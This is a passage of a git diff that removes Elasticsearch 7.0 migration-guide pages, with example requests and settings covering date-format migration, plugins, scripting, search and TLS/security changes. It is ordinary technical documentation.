changes using real data before -deploying in production. - -For help with date debugging, consider using -https://esddd.herokuapp.com/[https://esddd.herokuapp.com/.] 
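One lightweight way to test is to create a throwaway index that uses the converted java-time pattern and index a representative document to confirm it parses. The index name, pattern, and sample value below are illustrative only.

[source,console]
--------------------------------------------------
PUT /format-test
{
  "mappings": {
    "properties": {
      "ts": {
        "type": "date",
        "format": "8uuuu-MM-dd'T'HH:mm:ssXXX"
      }
    }
  }
}

POST /format-test/_doc
{
  "ts": "2019-01-01T01:02:03+01:00"
}
--------------------------------------------------
// TEST[skip:sketch only, index name and pattern are hypothetical]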
- -[[java-time-migrate-update-mappings]] -==== Update index mappings -To update joda-time date formats in index mappings, you must create a new index -with an updated mapping and reindex your data to it. -You can however update your pipelines or templates. - -The following `my-index-000001` index contains a mapping for the `datetime` field, a -`date` field with a custom joda-time date format. -//// -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "datetime": { - "type": "date", - "format": "yyyy/MM/dd HH:mm:ss||yyyy/MM/dd||epoch_millis" - } - } - } -} --------------------------------------------------- -//// - -[source,console] --------------------------------------------------- -GET my-index-000001/_mapping --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "my-index-000001" : { - "mappings" : { - "properties" : { - "datetime": { - "type": "date", - "format": "yyyy/MM/dd HH:mm:ss||yyyy/MM/dd||epoch_millis" - } - } - } - } -} --------------------------------------------------- - - -To change the date format for the `datetime` field, create a separate index -containing an updated mapping and date format. - -For example, the following `my-index-000002` index changes the `datetime` field's -date format to `8uuuu/MM/dd HH:mm:ss||uuuu/MM/dd||epoch_millis`. The `8` prefix -indicates this date format uses java time. - -[source,console] --------------------------------------------------- -PUT my-index-000002 -{ - "mappings": { - "properties": { - "datetime": { - "type": "date", - "format": "8uuuu/MM/dd HH:mm:ss||uuuu/MM/dd||epoch_millis" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Next, reindex data from the old index to the new index. - -The following <> API request reindexes data from -`my-index-000001` to `my-index-000002`. - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-index-000002" - } -} --------------------------------------------------- -// TEST[continued] - -If you use index aliases, update them to point to the new index. - -[source,console] --------------------------------------------------- -POST /_aliases -{ - "actions" : [ - { "remove" : { "index" : "my-index-000001", "alias" : "my-index" } }, - { "add" : { "index" : "my-index-000002", "alias" : "my-index" } } - ] -} --------------------------------------------------- -// TEST[continued] - -[[java-time-migration-update-ingest-pipelines]] -===== Update ingest pipelines -If your ingest pipelines contain joda-time date formats, you can update them -using the <> API. - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/my_pipeline -{ - "description": "Pipeline for routing data to specific index", - "processors": [ - { - "date": { - "field": "createdTime", - "formats": [ - "8uuuu-w" - ] - }, - "date_index_name": { - "field": "@timestamp", - "date_rounding": "d", - "index_name_prefix": "x-", - "index_name_format": "8uuuu-w" - } - } - ] -} --------------------------------------------------- - - -[[java-time-migration-update-index-templates]] -===== Update index templates - -If your index templates contain joda-time date formats, you can update them -using the <> API. 
- -[source,console] --------------------------------------------------- -PUT _template/template_1 -{ - "index_patterns": [ - "te*", - "bar*" - ], - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "_source": { - "enabled": false - }, - "properties": { - "host_name": { - "type": "keyword" - }, - "created_at": { - "type": "date", - "format": "8EEE MMM dd HH:mm:ss Z yyyy" - } - } - } -} --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -DELETE /_template/template_1 --------------------------------------------------- -// TEST[continued] -//// - -[[java-time-migration-update-external-tools-templates]] -===== Update external tools and templates -Ensure you also update any date formats in templates or tools outside of {es}. -This can include tools such as {beats-ref}/getting-started.html[{beats}] or -{logstash-ref}/index.html[Logstash]. diff --git a/docs/reference/migration/migrate_7_0/ml.asciidoc b/docs/reference/migration/migrate_7_0/ml.asciidoc deleted file mode 100644 index df5af8b3f4c..00000000000 --- a/docs/reference/migration/migrate_7_0/ml.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[discrete] -[[breaking_70_ml_changes]] -=== ML changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Types in Datafeed config are no longer valid -Types have been removed from the datafeed config and are no longer -valid parameters. diff --git a/docs/reference/migration/migrate_7_0/node.asciidoc b/docs/reference/migration/migrate_7_0/node.asciidoc deleted file mode 100644 index 2bbc4fcef7a..00000000000 --- a/docs/reference/migration/migrate_7_0/node.asciidoc +++ /dev/null @@ -1,22 +0,0 @@ -[discrete] -[[breaking_70_node_changes]] -=== Node start up - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Nodes with left-behind data or metadata refuse to start -Repurposing an existing node by changing node.master or node.data to false can leave lingering on-disk metadata and -data around, which will not be accessible by the node's new role. Beside storing non-accessible data, this can lead -to situations where dangling indices are imported even though the node might not be able to host any shards, leading -to a red cluster health. To avoid this, - -* nodes with on-disk shard data and node.data set to false will refuse to start -* nodes with on-disk index/shard data and both node.master and node.data set to false will refuse to start - -Beware that such role changes done prior to the 7.0 upgrade could prevent node start up in 7.0. 
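For the datafeed change above, a 7.0 datafeed configuration simply omits the removed `types` array; a sketch with hypothetical datafeed, job, and index names:

[source,console]
--------------------------------------------------
PUT _ml/datafeeds/datafeed-example
{
  "job_id": "example-job",
  "indices": ["server-logs-*"],
  "query": { "match_all": {} }
}
--------------------------------------------------
// TEST[skip:sketch only, the referenced job does not exist]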
diff --git a/docs/reference/migration/migrate_7_0/packaging.asciidoc b/docs/reference/migration/migrate_7_0/packaging.asciidoc deleted file mode 100644 index e1ea4c70d37..00000000000 --- a/docs/reference/migration/migrate_7_0/packaging.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[discrete] -[[breaking_70_packaging_changes]] -=== Packaging changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[systemd-service-file-config]] -==== systemd service file is no longer configuration - -The systemd service file `/usr/lib/systemd/system/elasticsearch.service` -was previously marked as a configuration file in rpm and deb packages. -Overrides to the systemd elasticsearch service should be made -in `/etc/systemd/system/elasticsearch.service.d/override.conf`. - -[discrete] -==== tar package no longer includes windows specific files - -The tar package previously included files in the `bin` directory meant only -for windows. These files have been removed. Use the `zip` package instead. - -[discrete] -==== Ubuntu 14.04 is no longer supported - -Ubuntu 14.04 will reach end-of-life on April 30, 2019. As such, we are no longer -supporting Ubuntu 14.04. - -[discrete] -==== CLI secret prompting is no longer supported -The ability to use `${prompt.secret}` and `${prompt.text}` to collect secrets -from the CLI at server start is no longer supported. Secure settings have replaced -the need for these prompts. diff --git a/docs/reference/migration/migrate_7_0/plugins.asciidoc b/docs/reference/migration/migrate_7_0/plugins.asciidoc deleted file mode 100644 index 41687e08e79..00000000000 --- a/docs/reference/migration/migrate_7_0/plugins.asciidoc +++ /dev/null @@ -1,91 +0,0 @@ -[discrete] -[[breaking_70_plugins_changes]] -=== Plugins changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Azure Repository plugin - -* The legacy azure settings which where starting with `cloud.azure.storage.` prefix have been removed. -This includes `account`, `key`, `default` and `timeout`. -You need to use settings which are starting with `azure.client.` prefix instead. - -* Global timeout setting `cloud.azure.storage.timeout` has been removed. -You must set it per azure client instead. Like `azure.client.default.timeout: 10s` for example. - -See {plugins}/repository-azure-repository-settings.html#repository-azure-repository-settings[Azure Repository settings]. - -[discrete] -==== Google Cloud Storage Repository plugin - -* The repository settings `application_name`, `connect_timeout` and `read_timeout` have been removed and -must now be specified in the client settings instead. - -See {plugins}/repository-gcs-client.html#repository-gcs-client[Google Cloud Storage Client Settings]. - -[discrete] -==== S3 Repository Plugin - -* The plugin now uses the path style access pattern for all requests. -In previous versions it was automatically determining whether to use virtual hosted style or path style -access. 
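With the legacy `cloud.azure.storage.*` settings removed, a repository now references a named client whose credentials and timeout are configured on the node. A sketch of registering such a repository follows; the repository, client, and container names are placeholders.

[source,console]
--------------------------------------------------
PUT _snapshot/my_azure_repository
{
  "type": "azure",
  "settings": {
    "client": "default",
    "container": "elasticsearch-snapshots"
  }
}
--------------------------------------------------
// TEST[skip:sketch only, requires the repository-azure plugin and a configured client]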
- -[discrete] -==== Analysis Plugin changes - -* The misspelled helper method `requriesAnalysisSettings(AnalyzerProvider provider)` has been -renamed to `requiresAnalysisSettings` - -[discrete] -==== File-based discovery plugin - -* This plugin has been removed since its functionality is now part of -Elasticsearch and requires no plugin. The location of the hosts file has moved -from `$ES_PATH_CONF/file-discovery/unicast_hosts.txt` to -`$ES_PATH_CONF/unicast_hosts.txt`. See <> for further information. - -[discrete] -==== Security Extensions - -As a consequence of the <>, -the `getRealmSettings` method has been removed from the `SecurityExtension` class, -and the `settings` method on `RealmConfig` now returns the node's (global) settings. -Custom security extensions should register their settings by implementing the standard -`Plugin.getSettings` method, and can retrieve them from `RealmConfig.settings()` or -using one of the `RealmConfig.getSetting` methods. -Each realm setting should be defined as an `AffixSetting` as shown in the example below: -[source,java] --------------------------------------------------- -Setting.AffixSetting MY_SETTING = Setting.affixKeySetting( - "xpack.security.authc.realms." + MY_REALM_TYPE + ".", "my_setting", - key -> Setting.simpleString(key, properties) -); --------------------------------------------------- - -The `RealmSettings.simpleString` method can be used as a convenience for the above. - -[discrete] -==== Tribe node removed - -Tribe node functionality has been removed in favor of -<>. - -[discrete] -==== Discovery implementations are no longer pluggable - -* The method `DiscoveryPlugin#getDiscoveryTypes()` was removed, so that plugins - can no longer provide their own discovery implementations. - -[discrete] -[[watcher-hipchat-action-removed]] -==== Watcher 'hipchat' action removed - -Hipchat has been deprecated and shut down as a service. The `hipchat` action for -watches has been removed. diff --git a/docs/reference/migration/migrate_7_0/restclient.asciidoc b/docs/reference/migration/migrate_7_0/restclient.asciidoc deleted file mode 100644 index 19f8ca1daff..00000000000 --- a/docs/reference/migration/migrate_7_0/restclient.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[discrete] -[[breaking_70_restclient_changes]] -=== High-level REST client changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[remove-header-args]] -==== API methods accepting `Header` argument have been removed - -All API methods accepting headers as a `Header` varargs argument, deprecated -since 6.4, have been removed in favour of the newly introduced methods that -accept instead a `RequestOptions` argument. In case you are not specifying any -header, e.g. `client.index(indexRequest)` becomes -`client.index(indexRequest, RequestOptions.DEFAULT)`. -In case you are specifying headers -e.g. `client.index(indexRequest, new Header("name" "value"))` becomes -`client.index(indexRequest, RequestOptions.DEFAULT.toBuilder().addHeader("name", "value").build());` - -[discrete] -[[cluster-health-api-default-cluster-level]] -==== Cluster Health API default to `cluster` level - -The Cluster Health API used to default to `shards` level to ease migration -from transport client that doesn't support the `level` parameter and always -returns information including indices and shards details. 
The level default -value has been aligned with the Elasticsearch default level: `cluster`. diff --git a/docs/reference/migration/migrate_7_0/scripting.asciidoc b/docs/reference/migration/migrate_7_0/scripting.asciidoc deleted file mode 100644 index cf72cbb1de0..00000000000 --- a/docs/reference/migration/migrate_7_0/scripting.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[discrete] -[[breaking_70_scripting_changes]] -=== Scripting changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - - -[discrete] -==== getDate() and getDates() removed - -Fields of type `long` and `date` had `getDate()` and `getDates()` methods -(for multi valued fields) to get an object with date specific helper methods -for the current doc value. In 5.3.0, `date` fields were changed to expose -this same date object directly when calling `doc["myfield"].value`, and -the getter methods for date objects were deprecated. These methods have -now been removed. Instead, use `.value` on `date` fields, or explicitly -parse `long` fields into a date object using -`Instance.ofEpochMillis(doc["myfield"].value)`. - -[discrete] -==== Accessing missing document values will throw an error -`doc['field'].value` will throw an exception if -the document is missing a value for the field `field`. - -To check if a document is missing a value, you can use -`doc['field'].size() == 0`. - - -[discrete] -[[script-errors-return-400-error-codes]] -==== Script errors will return as `400` error codes - -Malformed scripts, either in search templates, ingest pipelines or search -requests, return `400 - Bad request` while they would previously return -`500 - Internal Server Error`. This also applies for stored scripts. - -[discrete] -==== getValues() removed - -The `ScriptDocValues#getValues()` method is deprecated in 6.6 and will -be removed in 7.0. Use `doc["foo"]` in place of `doc["foo"].values`. diff --git a/docs/reference/migration/migrate_7_0/search.asciidoc b/docs/reference/migration/migrate_7_0/search.asciidoc deleted file mode 100644 index 1a05d948790..00000000000 --- a/docs/reference/migration/migrate_7_0/search.asciidoc +++ /dev/null @@ -1,317 +0,0 @@ -[discrete] -[[breaking_70_search_changes]] -=== Search and Query DSL changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Off-heap terms index - -The terms dictionary is the part of the inverted index that records all terms -that occur within a segment in sorted order. In order to provide fast retrieval, -terms dictionaries come with a small terms index that allows for efficient -random access by term. Until now this terms index had always been loaded -on-heap. - -As of 7.0, the terms index is loaded on-heap for fields that only have unique -values such as `_id` fields, and off-heap otherwise - likely most other fields. -This is expected to reduce memory requirements but might slow down search -requests if both below conditions are met: - -* The size of the data directory on each node is significantly larger than the - amount of memory that is available to the filesystem cache. 
- -* The number of matches of the query is not several orders of magnitude greater - than the number of terms that the query tries to match, either explicitly via - `term` or `terms` queries, or implicitly via multi-term queries such as - `prefix`, `wildcard` or `fuzzy` queries. - -This change affects both existing indices created with Elasticsearch 6.x and new -indices created with Elasticsearch 7.x. - -[discrete] -==== Changes to queries -* The default value for `transpositions` parameter of `fuzzy` query - has been changed to `true`. - -* The `query_string` options `use_dismax`, `split_on_whitespace`, - `all_fields`, `locale`, `auto_generate_phrase_query` and - `lowercase_expanded_terms` deprecated in 6.x have been removed. - -* Purely negative queries (only MUST_NOT clauses) now return a score of `0` - rather than `1`. - -* The boundary specified using geohashes in the `geo_bounding_box` query - now include entire geohash cell, instead of just geohash center. - -* Attempts to generate multi-term phrase queries against non-text fields - with a custom analyzer will now throw an exception. - -* An `envelope` crossing the dateline in a `geo_shape` query is now processed - correctly when specified using REST API instead of having its left and - right corners flipped. - -* Attempts to set `boost` on inner span queries will now throw a parsing exception. - -[discrete] -==== Adaptive replica selection enabled by default - -Adaptive replica selection has been enabled by default. If you wish to return to -the older round robin of search requests, you can use the -`cluster.routing.use_adaptive_replica_selection` setting: - -[source,console] --------------------------------------------------- -PUT /_cluster/settings -{ - "transient": { - "cluster.routing.use_adaptive_replica_selection": false - } -} --------------------------------------------------- - - -[discrete] -[[search-api-returns-400-invalid-requests]] -==== Search API returns `400` for invalid requests - -The Search API returns `400 - Bad request` while it would previously return -`500 - Internal Server Error` in the following cases of invalid request: - -* the result window is too large -* sort is used in combination with rescore -* the rescore window is too large -* the number of slices is too large -* keep alive for scroll is too large -* number of filters in the adjacency matrix aggregation is too large -* script compilation errors - -[discrete] -[[scroll-queries-cannot-use-request-cache]] -==== Scroll queries cannot use the `request_cache` anymore - -Setting `request_cache:true` on a query that creates a scroll (`scroll=1m`) -has been deprecated in 6 and will now return a `400 - Bad request`. -Scroll queries are not meant to be cached. - -[discrete] -[[scroll-queries-cannot-use-rescore]] -==== Scroll queries cannot use `rescore` anymore - -Including a rescore clause on a query that creates a scroll (`scroll=1m`) has -been deprecated in 6.5 and will now return a `400 - Bad request`. Allowing -rescore on scroll queries would break the scroll sort. In the 6.x line, the -rescore clause was silently ignored (for scroll queries), and it was allowed in -the 5.x line. - -[discrete] -==== Term Suggesters supported distance algorithms - -The following string distance algorithms were given additional names in 6.2 and -their existing names were deprecated. The deprecated names have now been -removed. 
- -* `levenstein` - replaced by `levenshtein` -* `jarowinkler` - replaced by `jaro_winkler` - -[discrete] -[[popular-mode-suggesters]] -==== `popular` mode for Suggesters - -The `popular` mode for Suggesters (`term` and `phrase`) now uses the doc frequency -(instead of the sum of the doc frequency) of the input terms to compute the frequency -threshold for candidate suggestions. - -[discrete] -==== Limiting the number of terms that can be used in a Terms Query request - -Executing a Terms Query with a lot of terms may degrade the cluster performance, -as each additional term demands extra processing and memory. -To safeguard against this, the maximum number of terms that can be used in a -Terms Query request has been limited to 65536. This default maximum can be changed -for a particular index with the index setting `index.max_terms_count`. - -[discrete] -==== Limiting the length of regex that can be used in a Regexp Query request - -Executing a Regexp Query with a long regex string may degrade search performance. -To safeguard against this, the maximum length of regex that can be used in a -Regexp Query request has been limited to 1000. This default maximum can be changed -for a particular index with the index setting `index.max_regex_length`. - -[discrete] -==== Limiting the number of auto-expanded fields - -Executing queries that use automatic expansion of fields (e.g. `query_string`, `simple_query_string` -or `multi_match`) can have performance issues for indices with a large numbers of fields. -To safeguard against this, a default limit of 1024 fields has been introduced for -queries using the "all fields" mode (`"default_field": "*"`) or other fieldname -expansions (e.g. `"foo*"`). If needed, you can change this limit using the -<> -dynamic cluster setting. - -[discrete] -[[invalid-search-request-body]] -==== Invalid `_search` request body - -Search requests with extra content after the main object will no longer be accepted -by the `_search` endpoint. A parsing exception will be thrown instead. - -[discrete] -==== Doc-value fields default format - -The format of doc-value fields is changing to be the same as what could be -obtained in 6.x with the special `use_field_mapping` format. This is mostly a -change for date fields, which are now formatted based on the format that is -configured in the mappings by default. This behavior can be changed by -specifying a <> within the doc-value -field. - -[discrete] -==== Context Completion Suggester - -The ability to query and index context enabled suggestions without context, -deprecated in 6.x, has been removed. Context enabled suggestion queries -without contexts have to visit every suggestion, which degrades the search performance -considerably. - -For geo context the value of the `path` parameter is now validated against the mapping, -and the context is only accepted if `path` points to a field with `geo_point` type. - -[discrete] -[[semantics-changed-max-concurrent-shared-requests]] -==== Semantics changed for `max_concurrent_shard_requests` - -`max_concurrent_shard_requests` used to limit the total number of concurrent shard -requests a single high level search request can execute. In 7.0 this changed to be the -max number of concurrent shard requests per node. The default is now `5`. - -[discrete] -[[max-score-set-to-null-when-untracked]] -==== `max_score` set to `null` when scores are not tracked - -`max_score` used to be set to `0` whenever scores are not tracked. 
`null` is now used
-instead, which is a more appropriate value for a scenario where scores are not available.
-
-[discrete]
-==== Negative boosts are not allowed
-
-Setting a negative `boost` for a query or a field, deprecated in 6.x, is not allowed in this version.
-To deboost a specific query or field you can use a `boost` value between 0 and 1.
-
-[discrete]
-==== Negative scores are not allowed in Function Score Query
-
-Negative scores in the Function Score Query were deprecated in 6.x and are
-not allowed in this version. If a negative score is produced as a result
-of computation (e.g. in `script_score` or `field_value_factor` functions),
-an error will be thrown.
-
-[discrete]
-==== The filter context has been removed
-
-The `filter` context has been removed from Elasticsearch's query builders;
-the distinction between queries and filters is now decided in Lucene depending
-on whether queries need to access the score or not. As a result, `bool` queries with
-`should` clauses that don't need to access the score will no longer set their
-`minimum_should_match` to 1. This behavior has been deprecated in the previous
-major version.
-
-//tag::notable-breaking-changes[]
-[discrete]
-[[hits-total-now-object-search-response]]
-==== `hits.total` is now an object in the search response
-
-The total number of hits that match the search request is now returned as an object
-with a `value` and a `relation`. `value` indicates the number of hits that
-match and `relation` indicates whether the value is accurate (`eq`) or a lower bound
-(`gte`):
-
-[source,js]
--------------------------------------------------
-{
-  "hits": {
-    "total": {
-      "value": 1000,
-      "relation": "eq"
-    },
-    ...
-  }
-}
--------------------------------------------------
-// NOTCONSOLE
-
-The `total` object in the response indicates that the query matches exactly 1000
-documents ("eq"). The `value` is always accurate (`"relation": "eq"`) when
-`track_total_hits` is set to true in the request.
-You can also retrieve `hits.total` as a number in the rest response by adding
-`rest_total_hits_as_int=true` in the request parameters of the search request.
-This parameter has been added to ease the transition to the new format and
-will be removed in the next major version (8.0).
-//end::notable-breaking-changes[]
-
-[discrete]
-[[hits-total-omitted-if-disabled]]
-==== `hits.total` is omitted in the response if `track_total_hits` is disabled (false)
-
-If `track_total_hits` is set to `false` in the search request, the search response
-will set `hits.total` to null and the object will not be displayed in the rest
-layer. You can add `rest_total_hits_as_int=true` in the search request parameters
-to get the old format back (`"total": -1`).
-
-//tag::notable-breaking-changes[]
-[discrete]
-[[track-total-hits-10000-default]]
-==== `track_total_hits` defaults to 10,000
-
-By default, search requests will count the total hits accurately up to `10,000`
-documents. If the total number of hits that match the query is greater than this
-value, the response will indicate that the returned value is a lower bound:
-
-[source,js]
--------------------------------------------------
-{
-  "_shards": ...
-  "timed_out": false,
-  "took": 100,
-  "hits": {
-    "max_score": 1.0,
-    "total": {
-      "value": 10000,    <1>
-      "relation": "gte"  <2>
-    },
-    "hits": ...
-  }
-}
--------------------------------------------------
-// NOTCONSOLE
-
-<1> There are at least 10000 documents that match the query
-<2> This is a lower bound (`"gte"`).
- -You can force the count to always be accurate by setting `track_total_hits` -to true explicitly in the search request. -//end::notable-breaking-changes[] - -[discrete] -==== Limitations on Similarities -Lucene 8 introduced more constraints on similarities, in particular: - -- scores must not be negative, -- scores must not decrease when term freq increases, -- scores must not increase when norm (interpreted as an unsigned long) increases. - -[discrete] -==== Weights in Function Score must be positive -Negative `weight` parameters in the `function_score` are no longer allowed. - -[discrete] -==== Query string and Simple query string limit expansion of fields to 1024 -The number of automatically expanded fields for the "all fields" -mode (`"default_field": "*"`) for the `query_string` and `simple_query_string` -queries is now 1024 fields. diff --git a/docs/reference/migration/migrate_7_0/settings.asciidoc b/docs/reference/migration/migrate_7_0/settings.asciidoc deleted file mode 100644 index 1a5227489c6..00000000000 --- a/docs/reference/migration/migrate_7_0/settings.asciidoc +++ /dev/null @@ -1,290 +0,0 @@ -[discrete] -[[breaking_70_settings_changes]] -=== Settings changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[default-node-name-now-hostname]] -==== The default for `node.name` is now the hostname - -`node.name` now defaults to the hostname at the time when Elasticsearch -is started. Previously the default node name was the first eight characters -of the node id. It can still be configured explicitly in `elasticsearch.yml`. - -[discrete] -==== Percolator - -* The deprecated `index.percolator.map_unmapped_fields_as_string` setting has been removed in favour of - the `index.percolator.map_unmapped_fields_as_text` setting. - -[discrete] -==== Index thread pool - -* Internally, single-document index/delete/update requests are executed as bulk - requests with a single-document payload. This means that these requests are - executed on the bulk thread pool. As such, the indexing thread pool is no - longer needed and has been removed. As such, the settings - `thread_pool.index.size` and `thread_pool.index.queue_size` have been removed. - -[discrete] -[[write-thread-pool-fallback]] -==== Write thread pool fallback - -* The bulk thread pool was replaced by the write thread pool in 6.3.0. However, - for backwards compatibility reasons the name `bulk` was still usable as fallback - settings `thread_pool.bulk.size` and `thread_pool.bulk.queue_size` for - `thread_pool.write.size` and `thread_pool.write.queue_size`, respectively, and - the system property `es.thread_pool.write.use_bulk_as_display_name` was - available to keep the display output in APIs as `bulk` instead of `write`. - These fallback settings and this system property have been removed. - -[discrete] -==== Disabling memory-mapping - -* The setting `node.store.allow_mmapfs` has been renamed to `node.store.allow_mmap`. - -[discrete] -[[remove-http-enabled]] -==== Http enabled setting removed - -* The setting `http.enabled` previously allowed disabling binding to HTTP, only allowing -use of the transport client. This setting has been removed, as the transport client -will be removed in the future, thus requiring HTTP to always be enabled. 
-
-[discrete]
-[[remove-http-pipelining-setting]]
-==== Http pipelining setting removed
-
-* The setting `http.pipelining` previously allowed disabling HTTP pipelining support.
-This setting has been removed, as disabling http pipelining support on the server
-provided little value. The setting `http.pipelining.max_events` can still be used to
-limit the number of pipelined requests in-flight.
-
-[discrete]
-==== Cross-cluster search settings renamed
-
-The cross-cluster search remote cluster connection infrastructure is also used
-in cross-cluster replication. This means that the setting names
-`search.remote.*` used for configuring cross-cluster search belie the fact that
-they also apply to other situations where a connection to a remote cluster is
-used. Therefore, these settings have been renamed from `search.remote.*` to
-`cluster.remote.*`. For backwards compatibility purposes, we will fall back to
-`search.remote.*` if `cluster.remote.*` is not set. For any such settings stored
-in the cluster state, or set on dynamic settings updates, we will automatically
-upgrade the setting from `search.remote.*` to `cluster.remote.*`. The fallback
-settings will be removed in 8.0.0.
-
-[discrete]
-[[audit-logfile-local-node-info]]
-==== Audit logfile local node info
-
-The following settings have been removed:
-
-- `xpack.security.audit.logfile.prefix.emit_node_host_address`, instead use
-  `xpack.security.audit.logfile.emit_node_host_address`
-- `xpack.security.audit.logfile.prefix.emit_node_host_name`, instead use
-  `xpack.security.audit.logfile.emit_node_host_name`
-- `xpack.security.audit.logfile.prefix.emit_node_name`, instead use
-  `xpack.security.audit.logfile.emit_node_name`
-
-The new settings have the same meaning as the removed ones, but the `prefix`
-name component is no longer meaningful as logfile audit entries are structured
-JSON documents and are not prefixed by anything.
-Moreover, `xpack.security.audit.logfile.emit_node_name` has changed its default
-from `true` to `false`. All other settings mentioned before have kept their
-default value of `false`.
-
-[discrete]
-[[include-realm-type-in-setting]]
-==== Security realms settings
-
-The settings for all security realms must now include the realm type as part
-of the setting name, and the explicit `type` setting has been removed.
-
-A realm that was previously configured as:
-[source,yaml]
--------------------------------------------------
-xpack.security.authc.realms:
-  ldap1:
-    type: ldap
-    order: 1
-    url: "ldaps://ldap.example.com/"
--------------------------------------------------
-
-Must be migrated to:
-[source,yaml]
--------------------------------------------------
-xpack.security.authc.realms:
-  ldap.ldap1:
-    order: 1
-    url: "ldaps://ldap.example.com/"
--------------------------------------------------
-
-Any realm-specific secure settings that have been stored in the elasticsearch
-keystore (such as ldap bind passwords, or passwords for ssl keys) must be updated
-in a similar way.
-
-[discrete]
-[[tls-setting-fallback]]
-==== TLS/SSL settings
-
-The default TLS/SSL settings, which were prefixed by `xpack.ssl`, have been removed.
-The removal of these default settings also removes the ability for a component to
-fall back to a default configuration when using TLS. Each component (realm, transport, http,
-http client, etc) must now be configured with its own settings for TLS if it is being
-used.
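-
-As a minimal sketch, an explicit per-component TLS configuration in
-`elasticsearch.yml` might look like the following; the keystore paths shown
-here are placeholders, not values taken from this guide:
-
-[source,yaml]
--------------------------------------------------
-# Transport layer (node-to-node) TLS; the keystore path is a placeholder
-xpack.security.transport.ssl.enabled: true
-xpack.security.transport.ssl.keystore.path: certs/transport.p12
-
-# HTTP layer (REST) TLS is configured separately; no shared xpack.ssl default applies
-xpack.security.http.ssl.enabled: true
-xpack.security.http.ssl.keystore.path: certs/http.p12
-------------------------------------------------- 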
- -[discrete] -[[tls-v1-removed]] -==== TLS v1.0 disabled - -TLS version 1.0 is now disabled by default as it suffers from -https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet#Rule_-_Only_Support_Strong_Protocols[known security issues]. -The default protocols are now TLSv1.3 (if supported), TLSv1.2 and TLSv1.1. - -You can enable TLS v1.0 by configuring the relevant `ssl.supported_protocols` -setting to include `"TLSv1"`. -Depending on your local configuration and the TLS protocols that are in use -on your network, you may need to enable TLS v1.0 support in any or all of the -following places: - -`xpack.security.http.ssl.supported_protocols`:: -For incoming HTTP connections to Elasticsearch's HTTP (Rest) interface. -If there are clients that connect to {es} and do not support newer TLS versions, -you must update this setting. - -`xpack.http.ssl.supported_protocols`:: -For outgoing HTTP connections from {watcher}. -If you have watches that connect to external HTTP servers and do not support -newer TLS versions, you must update this setting. - -`xpack.security.authc.realms.ldap.{name}.ssl.supported_protocols`:: -For outgoing LDAP connections from {es} {security-features}. -If you have an LDAP realm enabled and the LDAP directory to which that realm -connects does not support newer TLS versions, you must update this setting. - -`xpack.security.authc.realms.active_directory.{name}.ssl.supported_protocols`:: -For outgoing Active Directory (LDAP) connections from {es} {security-features}. -If you have an AD realm enabled and the directory server to which that realm -connects does not support newer TLS versions, you must update this setting. - -`xpack.security.authc.realms.saml.{name}.ssl.supported_protocols`:: -For outgoing HTTP connections to retrieve SAML metadata. -If you have a SAML realm enabled and the realm is configured to retrieve -metadata over HTTPS (that is, `idp.metadata.path` is a URL starting with -`https://`) and the web server which hosts the metadata does not support newer -TLS versions, you must update this setting. - -`xpack.security.authc.realms.oidc.{name}.ssl.supported_protocols`:: -For outgoing HTTP connections to an OpenId Connect Provider. -If you have an OpenId Connect ("oidc") realm enabled and the realm is configured -to connect to a remote OpenID Connect Provider which does not support newer TLS -versions, you must update this setting. - -`xpack.monitoring.exporters.{name}.ssl.supported_protocols`:: -For remote monitoring data. -If your monitoring data is exported to a remote monitoring cluster and that -cluster is configured to only support TLSv1, you must update this setting. - -`reindex.ssl.supported_protocols`:: -For reindex from remote. -If you reindex data from a remote {es} cluster which has SSL enabled on the -`http` interface and that cluster is configured to only support TLSv1, you must -update this setting. - -`xpack.security.transport.ssl.supported_protocols`:: -For incoming connections between {es} nodes. If you have specialized network -equipment which inspects TLS packets between your nodes, and that equipment -enforces TLSv1 you must update this setting. 
-
-
-The following is an example that enables TLS v1.0 for incoming HTTP connections:
-[source,yaml]
--------------------------------------------------
-xpack.security.http.ssl.supported_protocols: [ "TLSv1.3", "TLSv1.2", "TLSv1.1", "TLSv1" ]
--------------------------------------------------
-
-[discrete]
-[[trial-explicit-security]]
-==== Security on Trial Licenses
-
-On trial licenses, `xpack.security.enabled` defaults to `false`.
-
-In prior versions, a trial license would automatically enable security if either
-
-* `xpack.security.transport.enabled` was `true`; _or_
-* the trial license was generated on a version of X-Pack from 6.2 or earlier.
-
-This behaviour has now been removed, so security is only enabled if:
-
-* `xpack.security.enabled` is `true`; _or_
-* `xpack.security.enabled` is not set, and a gold or platinum license is installed.
-
-[discrete]
